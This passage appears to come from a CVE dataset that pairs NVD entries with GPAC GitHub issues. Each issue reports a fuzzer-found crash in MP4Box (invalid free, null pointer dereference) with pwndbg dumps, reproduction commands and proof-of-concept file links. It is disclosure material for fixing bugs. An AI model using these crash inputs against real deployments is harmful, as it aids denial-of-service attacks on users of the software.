0x7ffff75d9870 <free+32> mov rax, qword ptr [rdi - 8] 0x7ffff75d9874 <free+36> lea rsi, [rdi - 0x10] 0x7ffff75d9878 <free+40> test al, 2 0x7ffff75d987a <free+42> jne free+96 <free+96> ↓ 0x7ffff75d98b0 <free+96> mov edx, dword ptr [rip + 0x14d9fe] <0x7ffff77272b4> 0x7ffff75d98b6 <free+102> test edx, edx 0x7ffff75d98b8 <free+104> jne free+123 <free+123> ↓ 0x7ffff75d98cb <free+123> mov rdi, rsi 0x7ffff75d98ce <free+126> add rsp, 0x18 0x7ffff75d98d2 <free+130> jmp munmap_chunk <munmap_chunk> ↓ 0x7ffff75d4630 <munmap_chunk> sub rsp, 8 ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff7040 ◂— 0x0 ... ↓ 2 skipped 03:0018│ 0x7fffffff7058 —▸ 0x7ffff78c805d (gf_svg_delete_attribute_value+173) ◂— jmp 0x7ffff78c7ffe 04:0020│ 0x7fffffff7060 ◂— 0x0 05:0028│ 0x7fffffff7068 ◂— 0x1 06:0030│ 0x7fffffff7070 —▸ 0x5555555dfca0 ◂— 0x101 07:0038│ 0x7fffffff7078 —▸ 0x5555555d40d0 ◂— 0x0 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff75d9870 free+32 f 1 0x7ffff78c805d gf_svg_delete_attribute_value+173 f 2 0x7ffff78c815b gf_svg_delete_attribute_value+427 f 3 0x7ffff78e1b65 gf_node_delete_attributes+69 f 4 0x7ffff78c7c2a gf_svg_node_del+282 f 5 0x7ffff784a51d gf_node_unregister+349 f 6 0x7ffff784a6f4 gf_node_unregister_children+36 f 7 0x7ffff784a731 gf_sg_parent_reset+17 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 __GI___libc_free (mem=0x4183400000000000) at malloc.c:3102 #1 0x00007ffff78c805d in gf_svg_delete_attribute_value () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x00007ffff78c815b in gf_svg_delete_attribute_value () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #3 0x00007ffff78e1b65 in gf_node_delete_attributes () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #4 0x00007ffff78c7c2a in gf_svg_node_del () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #5 0x00007ffff784a51d in gf_node_unregister () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #6 0x00007ffff784a6f4 in gf_node_unregister_children () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #7 0x00007ffff784a731 in gf_sg_parent_reset () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #8 0x00007ffff78c7c32 in gf_svg_node_del () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #9 0x00007ffff784a51d in gf_node_unregister () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #10 0x00007ffff784a6f4 in gf_node_unregister_children () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #11 0x00007ffff784a731 in gf_sg_parent_reset () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #12 0x00007ffff78c7c32 in gf_svg_node_del () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #13 0x00007ffff784a51d in gf_node_unregister () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #14 0x00007ffff784f396 in gf_sg_command_del () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #15 0x00007ffff7a88203 in gf_sm_del () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #16 0x0000555555584423 in dump_isom_scene () #17 0x000055555557b42c in mp4boxMain () #18 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe208) at ../csu/libc-start.c:308 #19 0x000055555556c45e in _start () ``` `break gf_svg_delete_attribute_value` ``` 0x00007ffff78c8058 in gf_svg_delete_attribute_value () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x7ffff78c8050 (gf_svg_delete_attribute_value+160) ◂— mov rdi, qword ptr [rsi] RBX 0x1 RCX 0x0 RDX 0x7ffff7e0d800 ◂— 0xffaba7feffaba850 RDI 0x4183400000000000 RSI 0x5555555dfce0 ◂— 0x4183400000000000 R8 0x7 R9 0xfffffff6 R10 0x7ffff775ba72 ◂— 'gf_node_unregister_children' R11 0x7ffff784a6d0 (gf_node_unregister_children) ◂— endbr64 R12 0x5555555d40d0 ◂— 0x0 R13 0x2a R14 0x8 R15 0x5555555dfcc0 —▸ 0x5555555dfd00 —▸ 0x5555555dfce0 ◂— 0x4183400000000000 RBP 0x5555555dfce0 ◂— 0x4183400000000000 RSP 0x7fffffff7060 ◂— 0x0 *RIP 0x7ffff78c8058 (gf_svg_delete_attribute_value+168) ◂— call 0x7ffff77e2cb0 ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── 0x7ffff78c7fda <gf_svg_delete_attribute_value+42> add rax, rdx 0x7ffff78c7fdd <gf_svg_delete_attribute_value+45> jmp rax ↓ 0x7ffff78c8050 <gf_svg_delete_attribute_value+160> mov rdi, qword ptr [rsi] 0x7ffff78c8053 <gf_svg_delete_attribute_value+163> test rdi, rdi 0x7ffff78c8056 <gf_svg_delete_attribute_value+166> je gf_svg_delete_attribute_value+78 <gf_svg_delete_attribute_value+78> ► 0x7ffff78c8058 <gf_svg_delete_attribute_value+168> call gf_free@plt <gf_free@plt> rdi: 0x4183400000000000 rsi: 0x5555555dfce0 ◂— 0x4183400000000000 rdx: 0x7ffff7e0d800 ◂— 0xffaba7feffaba850 rcx: 0x0 0x7ffff78c805d <gf_svg_delete_attribute_value+173> jmp gf_svg_delete_attribute_value+78 <gf_svg_delete_attribute_value+78> 0x7ffff78c805f <gf_svg_delete_attribute_value+175> nop 0x7ffff78c8060 <gf_svg_delete_attribute_value+176> mov r14, qword ptr [rsi] 0x7ffff78c8063 <gf_svg_delete_attribute_value+179> xor ebx, ebx 0x7ffff78c8065 <gf_svg_delete_attribute_value+181> mov rdi, r14 ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff7060 ◂— 0x0 01:0008│ 0x7fffffff7068 ◂— 0x1 02:0010│ 0x7fffffff7070 —▸ 0x5555555dfca0 ◂— 0x101 03:0018│ 0x7fffffff7078 —▸ 0x5555555d40d0 ◂— 0x0 04:0020│ 0x7fffffff7080 ◂— 0x2a /* '*' */ 05:0028│ 0x7fffffff7088 ◂— 0x8 06:0030│ 0x7fffffff7090 —▸ 0x5555555dfcc0 —▸ 0x5555555dfd00 —▸ 0x5555555dfce0 ◂— 0x4183400000000000 07:0038│ 0x7fffffff7098 —▸ 0x7ffff78c815b (gf_svg_delete_attribute_value+427) ◂— cmp r14d, ebx ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff78c8058 gf_svg_delete_attribute_value+168 f 1 0x7ffff78c815b gf_svg_delete_attribute_value+427 f 2 0x7ffff78e1b65 gf_node_delete_attributes+69 f 3 0x7ffff78c7c2a gf_svg_node_del+282 f 4 0x7ffff784a51d gf_node_unregister+349 f 5 0x7ffff784a6f4 gf_node_unregister_children+36 f 6 0x7ffff784a731 gf_sg_parent_reset+17 f 7 0x7ffff78c7c32 gf_svg_node_del+290 ────────────────────────────────────────────────────────────────────────────────────────────────────── __GI___libc_free (mem=0x4183400000000000) at malloc.c:3087 3087 malloc.c: No such file or directory. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x7ffff78c8050 (gf_svg_delete_attribute_value+160) ◂— mov rdi, qword ptr [rsi] RBX 0x1 RCX 0x0 RDX 0x7ffff7e0d800 ◂— 0xffaba7feffaba850 RDI 0x4183400000000000 RSI 0x5555555dfce0 ◂— 0x4183400000000000 R8 0x7 R9 0xfffffff6 R10 0x7ffff775ba72 ◂— 'gf_node_unregister_children' R11 0x7ffff784a6d0 (gf_node_unregister_children) ◂— endbr64 R12 0x5555555d40d0 ◂— 0x0 R13 0x2a R14 0x8 R15 0x5555555dfcc0 —▸ 0x5555555dfd00 —▸ 0x5555555dfce0 ◂— 0x4183400000000000 RBP 0x5555555dfce0 ◂— 0x4183400000000000 RSP 0x7fffffff7058 —▸ 0x7ffff78c805d (gf_svg_delete_attribute_value+173) ◂— jmp 0x7ffff78c7ffe *RIP 0x7ffff75d9850 (free) ◂— endbr64 ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── 0x7ffff77e2cb4 <gf_free@plt+4> bnd jmp qword ptr [rip + 0x7bc045] <gf_free> ↓ 0x7ffff77f9f30 <gf_free> endbr64 0x7ffff77f9f34 <gf_free+4> jmp free@plt <free@plt> ↓ 0x7ffff77e2840 <free@plt> endbr64 0x7ffff77e2844 <free@plt+4> bnd jmp qword ptr [rip + 0x7bc27d] <free> ↓ ► 0x7ffff75d9850 <free> endbr64 0x7ffff75d9854 <free+4> sub rsp, 0x18 0x7ffff75d9858 <free+8> mov rax, qword ptr [rip + 0x14d699] 0x7ffff75d985f <free+15> mov rax, qword ptr [rax] 0x7ffff75d9862 <free+18> test rax, rax 0x7ffff75d9865 <free+21> jne free+152 <free+152> ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff7058 —▸ 0x7ffff78c805d (gf_svg_delete_attribute_value+173) ◂— jmp 0x7ffff78c7ffe 01:0008│ 0x7fffffff7060 ◂— 0x0 02:0010│ 0x7fffffff7068 ◂— 0x1 03:0018│ 0x7fffffff7070 —▸ 0x5555555dfca0 ◂— 0x101 04:0020│ 0x7fffffff7078 —▸ 0x5555555d40d0 ◂— 0x0 05:0028│ 0x7fffffff7080 ◂— 0x2a /* '*' */ 06:0030│ 0x7fffffff7088 ◂— 0x8 07:0038│ 0x7fffffff7090 —▸ 0x5555555dfcc0 —▸ 0x5555555dfd00 —▸ 0x5555555dfce0 ◂— 0x4183400000000000 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff75d9850 free f 1 0x7ffff78c805d gf_svg_delete_attribute_value+173 f 2 0x7ffff78c815b gf_svg_delete_attribute_value+427 f 3 0x7ffff78e1b65 gf_node_delete_attributes+69 f 4 0x7ffff78c7c2a gf_svg_node_del+282 f 5 0x7ffff784a51d gf_node_unregister+349 f 6 0x7ffff784a6f4 gf_node_unregister_children+36 f 7 0x7ffff784a731 gf_sg_parent_reset+17 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> c Continuing. Program received signal SIGSEGV, Segmentation fault. __GI___libc_free (mem=0x4183400000000000) at malloc.c:3102 3102 in malloc.c LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── *RAX 0x0 RBX 0x1 RCX 0x0 RDX 0x7ffff7e0d800 ◂— 0xffaba7feffaba850 RDI 0x4183400000000000 RSI 0x5555555dfce0 ◂— 0x4183400000000000 R8 0x7 R9 0xfffffff6 R10 0x7ffff775ba72 ◂— 'gf_node_unregister_children' R11 0x7ffff784a6d0 (gf_node_unregister_children) ◂— endbr64 R12 0x5555555d40d0 ◂— 0x0 R13 0x2a R14 0x8 R15 0x5555555dfcc0 —▸ 0x5555555dfd00 —▸ 0x5555555dfce0 ◂— 0x4183400000000000 RBP 0x5555555dfce0 ◂— 0x4183400000000000 *RSP 0x7fffffff7040 ◂— 0x0 *RIP 0x7ffff75d9870 (free+32) ◂— mov rax, qword ptr [rdi - 8] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff75d9870 <free+32> mov rax, qword ptr [rdi - 8] 0x7ffff75d9874 <free+36> lea rsi, [rdi - 0x10] 0x7ffff75d9878 <free+40> test al, 2 0x7ffff75d987a <free+42> jne free+96 <free+96> ↓ 0x7ffff75d98b0 <free+96> mov edx, dword ptr [rip + 0x14d9fe] <0x7ffff77272b4> 0x7ffff75d98b6 <free+102> test edx, edx 0x7ffff75d98b8 <free+104> jne free+123 <free+123> ↓ 0x7ffff75d98cb <free+123> mov rdi, rsi 0x7ffff75d98ce <free+126> add rsp, 0x18 0x7ffff75d98d2 <free+130> jmp munmap_chunk <munmap_chunk> ↓ 0x7ffff75d4630 <munmap_chunk> sub rsp, 8 ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff7040 ◂— 0x0 ... ↓ 2 skipped 03:0018│ 0x7fffffff7058 —▸ 0x7ffff78c805d (gf_svg_delete_attribute_value+173) ◂— jmp 0x7ffff78c7ffe 04:0020│ 0x7fffffff7060 ◂— 0x0 05:0028│ 0x7fffffff7068 ◂— 0x1 06:0030│ 0x7fffffff7070 —▸ 0x5555555dfca0 ◂— 0x101 07:0038│ 0x7fffffff7078 —▸ 0x5555555d40d0 ◂— 0x0 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff75d9870 free+32 f 1 0x7ffff78c805d gf_svg_delete_attribute_value+173 f 2 0x7ffff78c815b gf_svg_delete_attribute_value+427 f 3 0x7ffff78e1b65 gf_node_delete_attributes+69 f 4 0x7ffff78c7c2a gf_svg_node_del+282 f 5 0x7ffff784a51d gf_node_unregister+349 f 6 0x7ffff784a6f4 gf_node_unregister_children+36 f 7 0x7ffff784a731 gf_sg_parent_reset+17 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> ```
Invalid free in gf_svg_delete_attribute_value()
https://api.github.com/repos/gpac/gpac/issues/1975/comments
0
2021-12-11T01:07:09Z
2021-12-13T13:22:08Z
https://github.com/gpac/gpac/issues/1975
1,077,343,434
1,975
2,911
CVE-2021-45266
2021-12-22T18:15:08.220
A null pointer dereference vulnerability exists in gpac 1.1.0 via the lsr_read_anim_values_ex function, which causes a segmentation fault and application crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1985" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1985" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:dev:*:*:*:*:*:*", "matchCriteriaId": "A713E8C4-E079-4ECB-AF9C-DC0EC80D089D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1985
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A null pointer dereference was discovered in lsr_read_anim_values_ex(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-rev1555-g339e7a736-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/root/fuck_bin/gpac/test Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -bt ``` [lsr_read_anim_values_ex.part-lsr_read_animateTransform.zip](https://github.com/gpac/gpac/files/7708233/lsr_read_anim_values_ex.part-lsr_read_animateTransform.zip) **Result** lsr_read_anim_values_ex.part-lsr_read_animateTransform/id:000439,si g:11,src:004575+004803,op:splice,rep:2 ``` ../../test/lib/MP4Box -bt lsr_read_anim_values_ex.part-lsr_read_animateTransform/id:000439,si g:11,src:004575+004803,op:splice,rep:2 [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 853091 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 853091 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 LASeR Scene Parsing [LASeR] memory overread - corrupted decoding [1] 1634950 segmentation fault ../../test/lib/MP4Box -bt ``` **gdb** lsr_read_anim_values_ex.part-lsr_read_animateTransform/id:000439,si g:11,src:004575+004803,op:splice,rep:2 ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7b551a6 in lsr_read_anim_values_ex.part () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 RBX 0x5 RCX 0x5555555c6010 ◂— 0x70006 RDX 0x6 RDI 0x5555556e4020 ◂— 0x0 RSI 0x1 R8 0x5555556e4000 ◂— 0x0 R9 0x0 R10 0x7ffff7759e4a ◂— 'gf_list_insert' R11 0x206 R12 0x5555555e1020 ◂— 0x54 /* 'T' */ R13 0x5555556e4000 ◂— 0x0 R14 0x5555555e35c0 —▸ 0x5555555e3630 ◂— 0x0 R15 0x5555556e4020 ◂— 0x0 RBP 0x3 RSP 0x7fffffff6c90 ◂— 0xf00000003 RIP 0x7ffff7b551a6 (lsr_read_anim_values_ex.part+1078) ◂— movss xmm0, dword ptr [rax] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff7b551a6 <lsr_read_anim_values_ex.part+1078> movss xmm0, dword ptr [rax] 0x7ffff7b551aa <lsr_read_anim_values_ex.part+1082> movss dword ptr [r13 + 8], xmm0 0x7ffff7b551b0 <lsr_read_anim_values_ex.part+1088> call gf_list_get@plt <gf_list_get@plt> 0x7ffff7b551b5 <lsr_read_anim_values_ex.part+1093> test rax, rax 0x7ffff7b551b8 <lsr_read_anim_values_ex.part+1096> je lsr_read_anim_values_ex.part+1108 <lsr_read_anim_values_ex.part+1108> 0x7ffff7b551ba <lsr_read_anim_values_ex.part+1098> movss xmm0, dword ptr [rax] 0x7ffff7b551be <lsr_read_anim_values_ex.part+1102> movss dword ptr [r13], xmm0 0x7ffff7b551c4 <lsr_read_anim_values_ex.part+1108> mov esi, 2 0x7ffff7b551c9 <lsr_read_anim_values_ex.part+1113> mov rdi, r15 0x7ffff7b551cc <lsr_read_anim_values_ex.part+1116> call gf_list_get@plt <gf_list_get@plt> 0x7ffff7b551d1 <lsr_read_anim_values_ex.part+1121> test rax, rax ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff6c90 ◂— 0xf00000003 01:0008│ 0x7fffffff6c98 ◂— 0x7fff00000008 02:0010│ 0x7fffffff6ca0 ◂— 0x350000006e /* 'n' */ 03:0018│ 0x7fffffff6ca8 —▸ 0x5555555e1020 ◂— 0x54 /* 'T' */ 04:0020│ 0x7fffffff6cb0 ◂— 0x0 05:0028│ 0x7fffffff6cb8 —▸ 0x5555555e0f00 —▸ 0x5555555e0f20 —▸ 0x5555555e0f60 —▸ 0x5555555e0f40 ◂— ... 06:0030│ 0x7fffffff6cc0 ◂— 0x0 07:0038│ 0x7fffffff6cc8 ◂— 0x2748627e3b91600 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff7b551a6 lsr_read_anim_values_ex.part+1078 f 1 0x7ffff7b5d9e8 lsr_read_animateTransform+424 f 2 0x7ffff7b5beeb lsr_read_scene_content_model+1547 f 3 0x7ffff7b5c89c lsr_read_group_content.part+316 f 4 0x7ffff7b60a76 lsr_read_svg+838 f 5 0x7ffff7b58817 lsr_read_command_list+759 f 6 0x7ffff7b5ab74 lsr_decode_laser_unit+708 f 7 0x7ffff7b6239d gf_laser_decode_command_list+333 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff7b551a6 in lsr_read_anim_values_ex.part () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #1 0x00007ffff7b5d9e8 in lsr_read_animateTransform () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #2 0x00007ffff7b5beeb in lsr_read_scene_content_model () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #3 0x00007ffff7b5c89c in lsr_read_group_content.part () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #4 0x00007ffff7b60a76 in lsr_read_svg () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #5 0x00007ffff7b58817 in lsr_read_command_list () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #6 0x00007ffff7b5ab74 in lsr_decode_laser_unit () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #7 0x00007ffff7b6239d in gf_laser_decode_command_list () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #8 0x00007ffff7aa3061 in gf_sm_load_run_isom () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #9 0x00005555555844a8 in dump_isom_scene () #10 0x000055555557b42c in mp4boxMain () #11 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe1c8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1b8) at ../csu/libc-start.c:308 #12 0x000055555556c45e in _start () ```
Null Pointer Dereference in lsr_read_anim_values_ex()
https://api.github.com/repos/gpac/gpac/issues/1985/comments
0
2021-12-14T02:40:51Z
2021-12-14T10:36:54Z
https://github.com/gpac/gpac/issues/1985
1,079,241,422
1,985
2,912
CVE-2021-45267
2021-12-22T18:15:08.257
An invalid memory address dereference vulnerability exists in gpac 1.1.0 via the svg_node_start function, which causes a segmentation fault and application crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1965" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1965" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:dev:*:*:*:*:*:*", "matchCriteriaId": "A713E8C4-E079-4ECB-AF9C-DC0EC80D089D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1965
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ An invalid memory address dereference was discovered in svg_node_start(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -lsr poc_2.xsr ``` [poc_2.zip](https://github.com/gpac/gpac/files/7692197/poc_2.zip) **Result** ``` [Parser] LASeR Scene Parsing: ./poc/poc_2.xsr [1] 75845 segmentation fault ./MP4Box -lsr ./poc/poc_2.xsr ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7aa5f97 in svg_node_start () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 RBX 0x5555555c7750 ◂— 0x0 RCX 0x0 RDX 0x5555555ce2b0 —▸ 0x5555555ce0e3 ◂— 0x7572742200706172 /* 'rap' */ RDI 0x7ffff7e447c9 ◂— 'Unable to parse chunk: %s' RSI 0x5555555ce0e3 ◂— 0x7572742200706172 /* 'rap' */ R8 0x7fffffff5c3c ◂— 0x0 R9 0x5555555ce0e3 ◂— 0x7572742200706172 /* 'rap' */ R10 0x0 R11 0x0 R12 0x5555555ce2b0 —▸ 0x5555555ce0e3 ◂— 0x7572742200706172 /* 'rap' */ R13 0x5555555ce0d5 ◂— 0x6e65637300666173 /* 'saf' */ R14 0x1 R15 0x0 RBP 0x5555555cf390 —▸ 0x7fffffff7310 ◂— 0x7 RSP 0x7fffffff5bb0 ◂— 0x0 RIP 0x7ffff7aa5f97 (svg_node_start+3095) ◂— mov rdi, qword ptr [rax + 0x20] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff7aa5f97 <svg_node_start+3095> mov rdi, qword ptr [rax + 0x20] 0x7ffff7aa5f9b <svg_node_start+3099> call gf_list_count@plt <gf_list_count@plt> 0x7ffff7aa5fa0 <svg_node_start+3104> test eax, eax 0x7ffff7aa5fa2 <svg_node_start+3106> sete r15b 0x7ffff7aa5fa6 <svg_node_start+3110> test r14d, r14d 0x7ffff7aa5fa9 <svg_node_start+3113> jne svg_node_start+6240 <svg_node_start+6240> 0x7ffff7aa5faf <svg_node_start+3119> xor esi, esi 0x7ffff7aa5fb1 <svg_node_start+3121> nop dword ptr 